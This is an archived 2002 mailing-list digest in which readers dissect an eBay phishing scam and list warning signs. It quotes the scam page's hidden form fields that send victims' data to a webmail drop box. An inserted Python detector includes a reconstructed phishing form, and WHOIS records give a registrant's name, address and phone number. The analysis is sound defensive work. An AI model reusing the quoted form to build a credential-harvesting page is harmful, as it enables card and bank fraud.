Politech mailing list archives

FC: Replies to scam stealing credit card numbers from eBay members


From: Declan McCullagh <declan () well com>
Date: Fri, 03 May 2002 00:51:52 -0400

Previous Politech message:

"Scam extracts credit card numbers, bank info from eBay members"
http://www.politechbot.com/p-03476.html

---

Date: Thu, 02 May 2002 08:25:45 -0500
To: declan () well com
From: "Randal J. King" <rjking () vtechnology com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

Declan -

Quick action on someone's part - the domain is down. I had a similar thing last week for PayPal. The tip-off often is, as it is in your case, poor grammar and overall sentence/paragraph construction. These scum spend a lot of time duplicating the look of a legitimate site to trap people.

-- Randy

---

From: "D McOwen" <dmcowen () bellsouth net>
To: <declan () well com>
Subject: RE: Scam extracts credit card numbers, bank info from eBay members
Date: Thu, 2 May 2002 09:39:40 -0400

Declan,

I've been getting the same sort of E-mails in the last two weeks with
various big name headers such as Yahoo, Amazon, MSN, AOL, Earthlink etc all
trying to do the same thing. If you put your info in their website including
credit card numbers, you give them the store.

Scammers and spammers have been really cranking it up a notch lately. I
suspect out of work programmers from the dot com crash have been recruited
for illegal purposes unfortunately.

Dave McOwen

---

From: "Anthony Healy" <thealy () magna com au>
To: <declan () well com>
Subject: RE: Scam extracts credit card numbers, bank info from eBay members
Date: Fri, 3 May 2002 01:04:11 +1000

And reason 6: Clumsy phraseology and inaccurate grammar. (How come
scammers are never good with grammar?)

> To avoid any inconvenience concerning an
> interruption of your service membership, in future.
> ...Remember to "doublecheck" all the fields for

Regards, Tony Healy

---

Date: Thu, 2 May 2002 19:34:01 -0700
To: declan () well com
From: Stanton McCandlish <mech () eff org>
Subject: Re: FC: Scam extracts credit card numbers, bank info from
 eBay members

At 9:57 AM -0400 on 5/2/02, Declan McCullagh wrote:

> Obvious reasons this is a scam:
> 1. Headers show it originated from sdn-ar-001nynyorp256.dialsprint.net
> 2. The destination URL is http://64.177.3.234/, which receives connectivity
>    from qwest.net, not ebay.com.
> 3. There's no reason for eBay to send this message to me
> 4. The site is not using secure-connection (https://) URLs
>    to protect sensitive information, which eBay almost certainly would.
> 5. Replies are directed to a yahoo.com address

6. A load of addresses in the To header, instead of Bcc'd or sent
individually, yet there are not nearly ENOUGH of them for this to
really be an eBay message. There are millions of eBay users, so even
between debiejean () aol com and debjames () austin rr com would be many,
many other addresses.
7. Really bad grammar, e.g.: "incorrect and/or (fraudulent)" and "To
avoid any inconvenience concerning an interruption of your service
membership, in future. Please take..."

--
Stanton McCandlish      mech () eff org       http://www.eff.org/~mech
Technical Director/Webmaster         Electronic Frontier Foundation
voice: +1 415 436 9333 x105                    fax: +1 415 436 9993
EFF, 454 Shotwell St.                    San Francisco CA 94110 USA

---

From: "Allen Smith" <easmith () beatrice rutgers edu>
Message-Id: <10205020900.ZM30484 () beatrice rutgers edu>
Date: Thu, 2 May 2002 09:00:20 -0400
To: Declan McCullagh <declan () well com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay members
Mime-Version: 1.0

On May 2,  8:40am, Declan McCullagh wrote:
> Obvious reasons this is a scam:
> 1. Headers show it originated from sdn-ar-001nynyorp256.dialsprint.net
> 2. The destination URL is http://64.177.3.234/, which receives connectivity
>    from qwest.net, not ebay.com.
> 3. There's no reason for eBay to send this message to me
> 4. The site is not using secure-connection (https://) URLs
>    to protect sensitive information, which eBay almost certainly would.
> 5. Replies are directed to a yahoo.com address

While I believe you're correct on most of this:
        A. eBay is not that great on security:
           http://news.com.com/2100-1017-870959.html
           http://spoor12.edup.tudelft.nl/SkyLined/docs/cross_site_scripting.archive.html
           so it would not be _that_ surprising to see them not using proper
           encryption.
        B. There's one thing you aren't mentioning, namely that email from
           ebay is unlikely to be coming from an email address they're
           shutting down in favor of a web form, namely
           "SafeHarbor () ebay com".

        -Allen

P.S. See http://news.com.com/2100-1017-857177.html for one past report on
this scam.

--
Allen Smith                     http://cesario.rutgers.edu/easmith/
September 11, 2001              A Day That Shall Live In Infamy II
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety." - Benjamin Franklin

---

Date: Thu, 02 May 2002 09:09:05 -0400
To: declan () well com
From: Brian McWilliams <brian () pc-radio com>
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

Declan,

That IP resolves to NOREAGAX02.COM. Was just registered yesterday and is using an EarthLink drop-box (bkclan666 () earthlink net) according to the HTML. Responsible parties have been notified.

This type of scam is getting old:

http://www.newsbytes.com/news/02/173962.html

Brian

+++

Olive Johnson
   3650 CARLTON ST
   BARNUM, Minnesota 55707
   US

   Domain Name: NOREAGAX02.COM

   Administrative Contact:
         Olive Johnson    noreaga01 () earthlink net
        Olive Johnson
        3650 CARLTON ST
        BARNUM, Minnesota 55707
        US
        Phone: 2183890280
        Fax: 555-555-5555
   Technical Contact:
        Apollo Hosting  registration () apollohosting com
        Apollo Hosting, Inc
        11712 Jefferson Ave. Suite 423
        Newport  News, Virginia 23606
        US
        Phone: 7578988666
        Fax: 8008610986

   Record updated on 2002-05-01 10:50:08.
   Record created on 2002-05-01.
   Record expires on 2003-05-01.
   Database last updated on 2002-05-02 08:58:17 EST.

   Domain servers in listed order:

   NS.APOLLOHOSTING.COM          216.147.43.193
   NS2.APOLLOHOSTING.COM         216.147.1.144

---

Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
        members
From: Steve Withers <swithers () mmp org nz>
To: declan () well com
Date: 03 May 2002 01:15:28 +1200

This looks like the guilty party:

<input type="HIDDEN" name="redirect" action="refresh" delay =" 0.3"
value="http://64.177.3.234/redirect.html">

<input type=HIDDEN name="recipient" value="bkclan666 () earthlink net">

Steve

---

From: "FourMat Technologies, Inc" <matt () fourmat-engineering com>
To: <declan () well com>
References: <20020502095719.A29274 () cluebot com>
Subject: Re: Scam extracts credit card numbers, bank info from eBay members
Date: Thu, 2 May 2002 09:15:28 -0400
Organization: FourMat Technologies, Inc

Another confirmation that it's a scam is the script that it uses to collect
information inside the code of the page, formmail.pl.  This is classically
just an information collecting script that emails the form fields to the
recipient, using the sendmail protocol.  Very simple and a total security
concern.  The recipient of the mail is bkclan666 () earthlink net  if that says
anything.

Hmm, interesting, go to the page and try to right click. It moves the
browser window around and beeps at you a lot.  Annoying.  I wonder if eBay
uses these tactics on their pages.   I would bet not.

This would probably be of interest to the guys over at slashdot.

Matt Hartman
FourMat Technologies, Inc
matt () fourmat-engineering com

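As an added example that is not part of any reply above: a small Python checker that applies the indicators discussed in this thread (a raw-IP, non-https URL; a form that posts to formmail.pl; a hidden "recipient" field pointing at a consumer webmail drop box, as Steve Withers and Matt Hartman note) to a page's HTML. The sample page, the cgi-bin path and the webmail domain list are constructed assumptions; the recipient value is the address quoted above, de-obfuscated.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Consumer webmail domains used as drop boxes in the thread (assumption: a fuller list in practice).
FREEMAIL = {"earthlink.net", "yahoo.com", "aol.com", "hotmail.com"}

# Constructed sample page modelled on the hidden fields quoted in the thread;
# the cgi-bin path is assumed, the recipient value is the one quoted above.
SAMPLE_HTML = """
<form method="POST" action="http://64.177.3.234/cgi-bin/formmail.pl">
<input type="HIDDEN" name="redirect" value="http://64.177.3.234/redirect.html">
<input type=HIDDEN name="recipient" value="bkclan666@earthlink.net">
<input type="text" name="cc_number">
</form>"""

class FormScanner(HTMLParser):
    """Collect form actions and hidden input fields from a page."""
    def __init__(self):
        super().__init__()
        self.actions, self.hidden = [], {}
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden[(a.get("name") or "").lower()] = a.get("value") or ""

def is_raw_ip(url):
    # True when the URL's host is a bare IPv4 address rather than a hostname.
    host = urlparse(url).hostname or ""
    return re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) is not None

def phishing_indicators(page_url, html):
    """Return the names of the thread's indicators that fire for a page."""
    scanner = FormScanner()
    scanner.feed(html)
    hits = []
    if urlparse(page_url).scheme != "https":
        hits.append("no-https")            # reason 4: no secure connection
    if is_raw_ip(page_url):
        hits.append("raw-ip-url")          # reason 2: bare IP, not ebay.com
    if any(is_raw_ip(u) for u in scanner.actions + [scanner.hidden.get("redirect", "")] if u):
        hits.append("form-target-raw-ip")  # form/redirect posts back to the IP
    if any("formmail" in a.lower() for a in scanner.actions):
        hits.append("formmail-script")     # mail-relay CGI noted by Matt Hartman
    recipient = scanner.hidden.get("recipient", "")
    if "@" in recipient and recipient.rsplit("@", 1)[1].lower() in FREEMAIL:
        hits.append("freemail-drop-box")   # reason 5: data goes to a webmail box
    return hits
```

Running phishing_indicators("http://64.177.3.234/", SAMPLE_HTML) fires all five indicators, while a legitimate https page posting to its own hostname fires none.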
---

Date: Thu, 02 May 2002 09:41:12 -0400
To: declan () well com
From: [someone who seemed to want to remain anonymous]
Subject: Re: FC: Scam extracts credit card numbers, bank info from eBay
  members

64.177.3.234 is a web server owned/operated by "noreagax02.com" running Apache 1.3.20 unix Apache JServ/1.1.2 PHP/4.1.2 FrontPage5.0.2.2510 Rewrit 1.1a on the Alabanza netblock.
Here are the details of Alabanza:
Alabanza, Inc. (NETBLK-ALABANZA-BALT-4)
   8309 Tinsley Rd.
   Baltimore, MD 21244
   US

   Netname: ALABANZA-BALT-4
   Netblock: 64.176.0.0 - 64.177.255.255
   Maintainer: ALAB

   Coordinator:
      Cunningham, Thomas  (TC12-ARIN)  ipadmin () alabanza com
      410-779-1400

   Domain System inverse mapping provided by:

   NS.ALABANZA.COM              209.239.47.252
   NS2.ALABANZA.COM             209.239.47.201

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 06-Oct-2000.
   Database last updated on  1-May-2002 19:59:42 EDT.


On the side....netsol cannot resolve noreagax02.com...?!

Hope this gets you on track :)

regards




-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
Declan McCullagh's photographs are at http://www.mccullagh.org/
-------------------------------------------------------------------------
Sign this pro-therapeutic cloning petition: http://www.franklinsociety.org
-------------------------------------------------------------------------